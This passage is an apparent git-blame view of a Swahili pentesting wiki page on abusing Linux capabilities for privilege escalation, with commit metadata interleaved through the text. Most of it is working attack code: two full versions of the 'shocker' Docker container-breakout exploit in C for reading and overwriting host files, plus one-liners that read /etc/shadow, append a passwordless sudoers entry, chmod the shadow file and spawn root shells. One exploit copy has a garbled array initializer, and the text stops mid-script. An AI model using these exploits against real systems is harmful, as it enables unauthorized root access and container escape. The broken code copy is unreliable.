											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Faili ya binary itaweza kusoma faili yoyote. Kwa hivyo, ikiwa faili kama tar ina uwezo huu, itaweza kusoma faili ya shadow:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								cd /etc
 								tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp
 								cd /tmp
 								tar -cxf shadow.tar.gz
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary2**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika kesi hii, fikiria kuwa kuna uwezo huu kwenye binary ya **`python`**. Ili kuorodhesha faili za mizizi, unaweza kufanya yafuatayo:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```python
 								import os
 								for r, d, f in os.walk('/root'):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								for filename in f:
 								print(filename)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Na ili kusoma faili unaweza kufanya:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```python
 								print(open("/etc/shadow", "r").read())
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano katika Mazingira (Docker breakout)**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
-												GitBook: No commit message

											
										
										
											2021-10-10 10:07:48 +00:00
+								```
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								capsh --print
 								Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
 								Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
 								Securebits: 00/0x0/1'b0
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								secure-noroot: no (unlocked)
 								secure-no-suid-fixup: no (unlocked)
 								secure-keep-caps: no (unlocked)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								uid=0(root)
 								gid=0(root)
 								groups=0(root)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa **DAC\_READ\_SEARCH** umewezeshwa. Kama matokeo, chombo kinaweza **kuchunguza michakato**.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kujifunza jinsi mbinu ifuatayo inavyofanya kazi katika [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) lakini kwa muhtasari **CAP\_DAC\_READ\_SEARCH** sio tu inaturuhusu kupitia mfumo wa faili bila ukaguzi wa idhini, lakini pia inaondoa wazi ukaguzi wowote kwa _**open\_by\_handle\_at(2)**_ na **inaweza kuruhusu michakato yetu kufikia faili nyeti zilizofunguliwa na michakato mingine**.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Mbinu ya awali ambayo inatumia uwezo huu kusoma faili kutoka kwenye mwenyeji inaweza kupatikana hapa: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), ifuatayo ni **toleo lililobadilishwa ambalo linakuwezesha kuonyesha faili unayotaka kusoma kama hoja ya kwanza na kuiweka kwenye faili.**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```c
 								#include <stdio.h>
 								#include <sys/types.h>
 								#include <sys/stat.h>
 								#include <fcntl.h>
 								#include <errno.h>
 								#include <stdlib.h>
 								#include <string.h>
 								#include <unistd.h>
 								#include <dirent.h>
 								#include <stdint.h>
 								// gcc shocker.c -o shocker
 								// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir
 								struct my_file_handle {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								unsigned int handle_bytes;
 								int handle_type;
 								unsigned char f_handle[8];
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								};
-												GitBook: [#3106] No subject

											
										
										
											2022-04-19 14:54:55 +00:00
+								void die(const char *msg)
 								{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								perror(msg);
 								exit(errno);
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
-												GitBook: [#3106] No subject

											
										
										
											2022-04-19 14:54:55 +00:00
+								void dump_handle(const struct my_file_handle *h)
 								{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
 								h->handle_type);
 								for (int i = 0; i < h->handle_bytes; ++i) {
 								fprintf(stderr,"0x%02x", h->f_handle[i]);
 								if ((i + 1) % 20 == 0)
 								fprintf(stderr,"\n");
 								if (i < h->handle_bytes - 1)
 								fprintf(stderr,", ");
 								}
 								fprintf(stderr,"};\n");
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
-												GitBook: [#3106] No subject

											
										
										
											2022-04-19 14:54:55 +00:00
+								int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle
 								*oh)
 								{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								int fd;
 								uint32_t ino = 0;
 								struct my_file_handle outh = {
 								.handle_bytes = 8,
 								.handle_type = 1
 								};
 								DIR *dir = NULL;
 								struct dirent *de = NULL;
 								path = strchr(path, '/');
 								// recursion stops if path has been resolved
 								if (!path) {
 								memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
 								oh->handle_type = 1;
 								oh->handle_bytes = 8;
 								return 1;
 								}
 								++path;
 								fprintf(stderr, "[*] Resolving '%s'\n", path);
 								if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
 								die("[-] open_by_handle_at");
 								if ((dir = fdopendir(fd)) == NULL)
 								die("[-] fdopendir");
 								for (;;) {
 								de = readdir(dir);
 								if (!de)
 								break;
 								fprintf(stderr, "[*] Found %s\n", de->d_name);
 								if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
 								fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
 								ino = de->d_ino;
 								break;
 								}
 								}
 								fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
 								if (de) {
 								for (uint32_t i = 0; i < 0xffffffff; ++i) {
 								outh.handle_bytes = 8;
 								outh.handle_type = 1;
 								memcpy(outh.f_handle, &ino, sizeof(ino));
 								memcpy(outh.f_handle + 4, &i, sizeof(i));
 								if ((i % (1<<20)) == 0)
 								fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
 								if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
 								closedir(dir);
 								close(fd);
 								dump_handle(&outh);
 								return find_handle(bfd, path, &outh, oh);
 								}
 								}
 								}
 								closedir(dir);
 								close(fd);
 								return 0;
-												GitBook: [#3106] No subject

											
										
										
											2022-04-19 14:54:55 +00:00
+								}
 								int main(int argc,char* argv[] )
 								{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								char buf[0x1000];
 								int fd1, fd2;
 								struct my_file_handle h;
 								struct my_file_handle root_h = {
 								.handle_bytes = 8,
 								.handle_type = 1,
 								.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
 								};
 								fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
 								"[***] The tea from the 90's kicks your sekurity again. [***]\n"
 								"[***] If you have pending sec consulting, I'll happily [***]\n"
 								"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
 								read(0, buf, 1);
 								// get a FS reference from something mounted in from outside
 								if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
 								die("[-] open");
 								if (find_handle(fd1, argv[1], &root_h, &h) <= 0)
 								die("[-] Cannot find valid handle!");
 								fprintf(stderr, "[!] Got a final handle!\n");
 								dump_handle(&h);
 								if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
 								die("[-] open_by_handle");
 								memset(buf, 0, sizeof(buf));
 								if (read(fd2, buf, sizeof(buf) - 1) < 0)
 								die("[-] read");
 								printf("Success!!\n");
 								FILE *fptr;
 								fptr = fopen(argv[2], "w");
 								fprintf(fptr,"%s", buf);
 								fclose(fptr);
 								close(fd2); close(fd1);
 								return 0;
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								```
-												GitBook: [#3106] No subject

											
										
										
											2022-04-19 14:54:55 +00:00
+								{% hint style="warning" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Exploit hii inahitaji kupata pointer kwa kitu kilichomount kwenye mwenyeji. Exploit ya awali ilikuwa inatumia faili /.dockerinit na toleo lililobadilishwa linatumia /etc/hostname. Ikiwa exploit haifanyi kazi, labda unahitaji kuweka faili tofauti. Ili kupata faili ambayo imemount kwenye mwenyeji, tuendeshe amri ya mount:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								{% endhint %}
-												GITBOOK-3968: change request with no subject merged in GitBook

											
										
										
											2023-06-06 22:57:49 +00:00
+								![](<../../.gitbook/assets/image (407) (1).png>)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing DAC\_READ\_SEARCH Capability" kutoka** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Spain** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								{% embed url="https://www.rootedcon.com/" %}
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_DAC\_OVERRIDE
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa unaweza kuepuka ukaguzi wa ruhusa ya kuandika kwenye faili yoyote, hivyo unaweza kuandika faili yoyote.**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kuna faili nyingi unazoweza **kuandika upya ili kuongeza mamlaka,** [**unaweza kupata wazo kutoka hapa**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika mfano huu, vim ina uwezo huu, hivyo unaweza kubadilisha faili yoyote kama _passwd_, _sudoers_ au _shadow_:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/usr/bin/vim = cap_dac_override+ep
 								vim /etc/sudoers #To overwrite it
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya 2**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika mfano huu, faili ya **`python`** itakuwa na uwezo huu. Unaweza kutumia python kubadilisha faili yoyote:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```python
 								file=open("/etc/sudoers","a")
 								file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
+								file.close()
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira + CAP_DAC_READ_SEARCH (Docker breakout)**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuangalia uwezo uliowezeshwa ndani ya chombo cha docker kwa kutumia:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```bash
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								capsh --print
 								Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
 								Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
 								Securebits: 00/0x0/1'b0
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								secure-noroot: no (unlocked)
 								secure-no-suid-fixup: no (unlocked)
 								secure-keep-caps: no (unlocked)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								uid=0(root)
 								gid=0(root)
 								groups=0(root)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwanza soma sehemu iliyotangulia ambayo [**inatumia uwezo wa DAC\_READ\_SEARCH kusoma faili za aina yoyote**](linux-capabilities.md#cap\_dac\_read\_search) ya mwenyeji na **kuchakata** shambulio.\
 								Kisha, **chakata toleo lifuatalo la shambulio la shocker** ambalo litakuruhusu **kuandika faili za aina yoyote** ndani ya mfumo wa faili wa mwenyeji:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```c
 								#include <stdio.h>
 								#include <sys/types.h>
 								#include <sys/stat.h>
 								#include <fcntl.h>
 								#include <errno.h>
 								#include <stdlib.h>
 								#include <string.h>
 								#include <unistd.h>
 								#include <dirent.h>
 								#include <stdint.h>
 								// gcc shocker_write.c -o shocker_write
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								// ./shocker_write /etc/passwd passwd
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
 								struct my_file_handle {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								unsigned int handle_bytes;
 								int handle_type;
 								unsigned char f_handle[8];
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								};
 								void die(const char * msg) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								perror(msg);
 								exit(errno);
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								void dump_handle(const struct my_file_handle * h) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes,
 								h -> handle_type);
 								for (int i = 0; i < h -> handle_bytes; ++i) {
 								fprintf(stderr, "0x%02x", h -> f_handle[i]);
 								if ((i + 1) % 20 == 0)
 								fprintf(stderr, "\n");
 								if (i < h -> handle_bytes - 1)
 								fprintf(stderr, ", ");
 								}
 								fprintf(stderr, "};\n");
 								}
-												GitBook: [master] one page modified
											
										
										
											2021-03-31 10:26:50 +00:00
+								int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
 								{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								int fd;
 								uint32_t ino = 0;
 								struct my_file_handle outh = {
 								.handle_bytes = 8,
 								.handle_type = 1
 								};
 								DIR * dir = NULL;
 								struct dirent * de = NULL;
 								path = strchr(path, '/');
 								// recursion stops if path has been resolved
 								if (!path) {
 								memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));
 								oh -> handle_type = 1;
 								oh -> handle_bytes = 8;
 								return 1;
 								}
 								++path;
 								fprintf(stderr, "[*] Resolving '%s'\n", path);
 								if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)
 								die("[-] open_by_handle_at");
 								if ((dir = fdopendir(fd)) == NULL)
 								die("[-] fdopendir");
 								for (;;) {
 								de = readdir(dir);
 								if (!de)
 								break;
 								fprintf(stderr, "[*] Found %s\n", de -> d_name);
 								if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {
 								fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino);
 								ino = de -> d_ino;
 								break;
 								}
 								}
 								fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
 								if (de) {
 								for (uint32_t i = 0; i < 0xffffffff; ++i) {
 								outh.handle_bytes = 8;
 								outh.handle_type = 1;
 								memcpy(outh.f_handle, & ino, sizeof(ino));
 								memcpy(outh.f_handle + 4, & i, sizeof(i));
 								if ((i % (1 << 20)) == 0)
 								fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i);
 								if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {
 								closedir(dir);
 								close(fd);
 								dump_handle( & outh);
 								return find_handle(bfd, path, & outh, oh);
 								}
 								}
 								}
 								closedir(dir);
 								close(fd);
 								return 0;
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								int main(int argc, char * argv[]) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								char buf[0x1000];
 								int fd1, fd2;
 								struct my_file_handle h;
 								struct my_file_handle root_h = {
 								.handle_bytes = 8,
 								.handle_type = 1,
 								.f_handle = {
 x02,
 ,
 ,
 ,
 ,
 ,
 ,
 
 								}
 								};
 								fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
 								"[***] The tea from the 90's kicks your sekurity again. [***]\n"
 								"[***] If you have pending sec consulting, I'll happily [***]\n"
 								"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
 								read(0, buf, 1);
 								// get a FS reference from something mounted in from outside
 								if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
 								die("[-] open");
 								if (find_handle(fd1, argv[1], & root_h, & h) <= 0)
 								die("[-] Cannot find valid handle!");
 								fprintf(stderr, "[!] Got a final handle!\n");
 								dump_handle( & h);
 								if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)
 								die("[-] open_by_handle");
 								char * line = NULL;
 								size_t len = 0;
 								FILE * fptr;
 								ssize_t read;
 								fptr = fopen(argv[2], "r");
 								while ((read = getline( & line, & len, fptr)) != -1) {
 								write(fd2, line, read);
 								}
 								printf("Success!!\n");
 								close(fd2);
 								close(fd1);
 								return 0;
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kutoroka kwenye kontena ya docker unaweza **kupakua** faili `/etc/shadow` na `/etc/passwd` kutoka kwenye mwenyeji, **kuongeza** mtumiaji **mpya**, na kutumia **`shocker_write`** kuwafuta. Kisha, **fikia** kupitia **ssh**.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing DAC\_OVERRIDE Capability" kutoka** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_CHOWN
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa niwezekana kubadilisha umiliki wa faili yoyote.**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tuchukulie kuwa binary ya **`python`** ina uwezo huu, unaweza **kubadilisha** **umiliki** wa faili ya **shadow**, **kubadilisha nenosiri la root**, na kuongeza mamlaka:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								python -c 'import os;os.chown("/etc/shadow",1000,1000)'
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Au na **`ruby`** binary ikiwa na uwezo huu:
-												Update linux-capabilities.md
											
										
										
											2021-09-20 16:18:05 +00:00
+								```bash
 								ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_FOWNER
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kwamba niwezekana kubadilisha ruhusa ya faili yoyote.**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa python ina uwezo huu, unaweza kubadilisha ruhusa ya faili ya kivuli, **kubadilisha nenosiri la root**, na kuongeza mamlaka:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```bash
 								python -c 'import os;os.chmod("/etc/shadow",0666)
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								### CAP\_SETUID
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kwamba ni rahisi kuweka kitambulisho cha mtumiaji kinachotumika kwenye mchakato ulioundwa.**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa python ina **uwezo** huu, unaweza kuitumia kwa urahisi kuongeza mamlaka hadi kwenye akaunti ya msimamizi (root):
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```python
 								import os
 								os.setuid(0)
 								os.system("/bin/bash")
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Njia nyingine:**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
+								```python
 								import os
 								import prctl
 								#add the capability to the effective set
 								prctl.cap_effective.setuid = True
 								os.setuid(0)
 								os.system("/bin/bash")
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SETGID
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kwamba niwezekana kuweka kitambulisho cha kikundi cha mchakato ulioundwa.**
-												GitBook: [master] 429 pages modified
											
										
										
											2021-01-08 17:01:29 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kuna faili nyingi unaweza **kubadilisha ili kuongeza mamlaka,** [**unaweza kupata wazo hapa**](payloads-to-execute.md#kubadilisha-faili-ili-kuongeza-mamlaka).
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika kesi hii, unapaswa kutafuta faili za kuvutia ambazo kikundi kinaweza kusoma kwa sababu unaweza kujifanya kuwa kikundi chochote:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								#Find every file writable by a group
 								find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
 								#Find every file writable by a group in /etc with a maxpath of 1
 								find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
 								#Find every file readable by a group in /etc with a maxpath of 1
 								find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Marafiki, mara tu utakapopata faili ambayo unaweza kuitumia (kwa kusoma au kuandika) ili kuongeza mamlaka, unaweza **kupata kifaa cha kuingia kwa kujifanya kama kikundi kinachovutia** kwa kutumia:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```python
 								import os
 								os.setgid(42)
 								os.system("/bin/bash")
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika kesi hii, kikundi cha shadow kilijifanya ili uweze kusoma faili `/etc/shadow`:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```bash
 								cat /etc/shadow
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa **docker** imefungwa, unaweza **kujifanya** kama **kikundi cha docker** na kuitumia vibaya kuwasiliana na [**socket ya docker** na kuongeza mamlaka](./#writable-docker-socket).
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SETFCAP
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa ni rahisi kuweka uwezo kwenye faili na michakato**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa python ina **uwezo** huu, unaweza kuitumia kwa urahisi kuongeza mamlaka hadi kwa mtumiaji mkuu:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
 								{% code title="setcapability.py" %}
 								```python
 								import ctypes, sys
 								#Load needed library
 								#You can find which library you need to load checking the libraries of local setcap binary
 								# ldd /sbin/setcap
